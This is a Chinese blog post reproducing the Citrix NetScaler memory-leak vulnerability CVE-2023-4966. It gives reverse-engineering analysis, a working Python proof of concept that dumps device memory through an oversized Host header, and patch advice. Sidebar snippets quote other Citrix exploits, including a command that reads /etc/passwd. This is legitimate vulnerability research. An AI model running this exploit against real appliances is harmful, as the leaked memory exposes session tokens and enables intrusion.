漏洞复现-Citrix 信息泄露漏洞分析(CVE-2023-4966)

于 2024-08-12 09:46:18 发布
阅读量1.2k 收藏 3
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandao_ahfengren/article/details/141123301
版权

1.漏洞描述

Citrix Systems Citrix NetScaler Gateway(Citrix Systems Gateway)和Citrix Systems NetScaler ADC都是美国思杰系统(Citrix Systems)公司的产品。

NetScaler ADC和NetScaler Gateway存在安全漏洞,该漏洞源于存在敏感信息泄露。

2.影响版本

  • NetScaler ADC and NetScaler Gateway 14.1 < 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 < 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 < 13.0-92.19
  • NetScaler ADC 13.1-FIPS < 13.1-37.164
  • NetScaler ADC 12.1-FIPS < 12.1-55.300
  • NetScaler ADC 12.1-NDcPP < 12.1-55.300

3.影响范围

4.漏洞分析

这里以 13.0-47 的固件为例子, 从固件拉出 nsppe 这个程序,用 IDA 打开分析。 搜索文章提到的字符串可以看到如下代码:

snprintf函数被用于将hostname参数拼接到print_temp_rule变量中,并根据返回的长度,通过ns_vpn_send_response函数返回HTTP请求的结果。这种对snprintf的使用方法是一个常见的错误。这里的hostname参数是由 HTTP 请求中的 Host 头决定的,因此这个参数的长度我们是完全可以控制的。
snprintf 这个函数应该返回的是 ”想要写入buffer 的字符串长度“ , 而不是实际写入buffer的字符长长度。可以从一个 DEMO 看出这个效果:

可以看到,当我想写入 16长度的字符串的时候, n2的值为 16, 而不是实际写入的长度。

另外到达这个函数的路由,通过对这个函数 ns_aaa_oauth_send_openid_config
 进行交叉引用一下子就看到了:

Poc:
#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
    print('Target must be provided (e.g. --target 192.168.1.200)')
    sys.exit(0)

hostname = args.target

if __name__ == "__main__":
    headers = {
        "Host": "a"*24576
    }
    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
    if r.status_code == 200:
        print("--- Dumped Memory ---")
        print(r.text[131050:])
        print("---      End      ---")
    else:
        print("Could not dump memory")

5.修复建议

  • 官方升级

目前官方已发布安全版本修复此漏洞,建议受影响的用户及时升级防护:

https://www.citrix.com/downloads/citrix-gateway/

https://www.citrix.com/downloads/citrix-adc/

玄道网安
关注
CVE-2020-8193:Citrix ADC漏洞
04-14
Citrix ADC漏洞 CVE清单 如果在代码中添加 response_str = json.dumps(r.headers.__dict__['_store']) if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private": print ("[+] Send Success!") print ("_"*80,"\n\n") print (r.text) print ("_"*80) while 1: PAYLOAD1 = quote(input("\n[+] Set File= "),"utf-8") url = '{0}/
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
最新发布
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
网络安全日报 2023年10月30日
Galaxy_0的博客
10-30 465
研究人员在周四发布的报告中,揭露了一种高度复杂的、持续多年的间谍框架,它与美国国家安全局(NSA)相关的恶意软件有相似之处。报告描述了一个名为StripedFly的框架,它能够截屏、获取系统版本信息、窃取网站登录用户名、密码和其他自动填充数据、访问Wi-Fi网络信息(包括密码)、录制麦克风音频,并识别和窃取敏感文件。StripedFly依赖于一个定制的EternalBlue漏洞利用程序——一种2016年泄露到网上的NSA恶意软件——来感染受害者。
【严重】Citrix ADC 和 Citrix Gateway 远程代码执行漏洞(PoC)
murphysec的博客
07-25 1396
Citrix ADC是应用程序交付和负载平衡解决方案,Citrix Gateway是一套安全的远程接入解决方案,常用于提供虚拟桌面和远程桌面服务,此外,Citrix ADC还被广泛用作Windows堡垒机。在 Citrix ADC 和 Citrix Gateway 受影响版本中,如果设备配置为网关(VPN 虚拟服务器、ICA 代理、CVPN、RDP 代理)或身份验证虚拟服务器。
Citrix篇】1-Citrix ADC/Gateway 远程代码执行漏洞CVE-2023-3519和升级方法
chen_yunan的博客
08-11 3058
Citrix ADC/Gateway 远程代码执行漏洞CVE-2023-3519和升级方法
Citrix 多个高危漏洞通告
爱国小白帽
07-12 1072
Citrix 多个高危漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 漏洞背景 2020年07月10日, 360CERT监测发现 Citrix 官方 发布了 Citrix ADC,Citrix Gateway和Citrix SD-WAN WANOP 组件中多个安全漏洞风险通告。漏洞等级:高危。 安全研究人员@dmaasland 已经于 07月10日 发布了 Citrix Netscaler / ADC 多个安全漏洞的研究报告。 Citrix
Citrix修复位于Gateway 和 ADC 中的严重漏洞
smellycat000的专栏
11-10 730
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士周二,Citrix 称修复了影响 Gateway 和 ADC 产品中的三个漏洞,其中包括一个严重级别的漏洞。Ctrix Gateway 广泛部署在本地和云环境中,是一个SSL VPN 解决方案,负责应用和设备的单点登录。Citrix ADC(此前被称为NetScaler ADC)是一款应用交付和加载均衡解决方案,负责交付多个云环境中应用程序的可见...
Citrix ADC(CVE-2023-3519)版本升级包
07-27
CVE(Common Vulnerabilities and Exposures)是一种标准化的系统,用于识别网络安全漏洞,而CVE-2023-3519是一个特定的漏洞标识符,表明Citrix ADC中存在一处已知的安全问题。 这个版本升级包旨在修复这个安全漏洞...
CVE-2019-19781:CVE-2019-19781-Citrix ADC Netscaler漏洞的远程执行代码
05-26
在以前称为NetScaler ADC的Citrix应用交付控制器(ADC)和以前称为NetScaler Gateway的Citrix Gateway中,已发现一个漏洞,如果利用该漏洞,则可能允许未经身份验证的攻击者执行任意代码执行。 编辑:来自Fireeye...
Citrix ADC(NSVPX-HyperV-13.0-47.24-)
07-28
Citrix ADC(原名NetScaler ADC)是一款强大的应用交付控制器,专为优化和保护企业级网络及应用程序流量而设计。该软件提供了负载均衡、安全、性能优化和多种云服务等功能,广泛应用于数据中心、混合云和多云环境中...
CVE-2019-19781:Citrix Application Delivery Controller和Citrix Gateway的远程代码执行漏洞[CVE-2019-19781]
03-21
CVE-2019-19781 Citrix Application Delivery Controller和Citrix Gateway的远程代码执行漏洞[CVE-2019-19781] 用法:bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE 例如:bash CVE-2019-19781.sh XX.XX.XX.XX'cat / etc / passwd' 参考 :
CVE-2019-19781 Citrix Application Delivery Controller和RCE.MD
04-13
CVE-2019-19781 Citrix Application Delivery Controller和RCE
Citrix 修复Workspace等多款产品中的多个严重漏洞
smellycat000的专栏
02-16 1176
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士思杰系统 (Citrix Systems) 公司发布了位于Virtual Apps、Desktops 和Workspace Apps产品中的多个漏洞。这些漏洞被评为高危级别,可导致对目标具有本地访问权限的攻击者提升权限并控制受影响系统。思杰用户遍布全球各地,因此阻止入侵者在受陷系统上提升权限非常重要。提升权限在很多网络攻击活动(如网络间谍活动和勒...
Citrix 修复 Ubuntu 版本安全访问客户端中的严重漏洞
smellycat000的专栏
07-13 548
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周二,Citrix 修复了Utuntu 版本 Secure Access 客户端中的一个严重漏洞,可被用于实现远程代码执行。不过,按照 Citrix安全公告中的说法,该漏洞CVE-2023-24492,CVSS评分9.6)需要用户交互才能被利用。NIST 发布安全公告指出,“Citrix Secure Acess for Ubuntu 中...
漏洞通告】Citrix 多个高危漏洞通告
爱国小白帽
07-12 1097
漏洞通告】Citrix 多个高危漏洞通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 来自专辑 历史重要漏洞通告及处置手册汇总 通告编号:NS-2020-0041 2020-07-12 TA****G: Citrix ADC、Citrix Gateway、Citrix SD-WAN WANOP 漏洞危害: ****攻击者利用漏洞,可实现任意文件上传/下载、拒绝服务、代码注入、权限提升等。****** 版本: **1.0 ** 1
【转载】Citrix Systems产品安全漏洞最新POC---CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 poc
安道实验室
07-14 1626
Citrix 简介 Citrix Systems Citrix Application Delivery Controller(ADC)等都是美国思杰系统(Citrix Systems)公司的产品。Citrix Application Delivery Controller是一款应用交付控制器。Citrix Systems Gateway(Citrix Systems NetScaler Gateway)是一套安全的远程接入解决方案。Citrix System SDWAN WAN-OP是一款SD-WAN(虚
目录遍历漏洞_漏洞预警 | Citrix XenMobile 目录遍历漏洞
weixin_39854730的博客
12-16 139
0x00 漏洞编号CVE-2020-82090x01 危险等级高危0x02 漏洞概述XenMobile是Citrix开发的企业移动性管理软件,该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。Citrix Endpoint Management存在任意文件读取漏洞,远程未授权攻击者 通过发送特制HTTP请求,可以读取受影响设备上任意文件。POC已公...
复现CVE-2023-21839
Coder的博客
05-02 1867
下载jdk1.8或#创建java文件夹#解压后更改文件夹名字为 jdk1.8.0.372#将文件夹移动到/usr/local/java目录下验证是否安装成功javac如有提示,安装完成。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值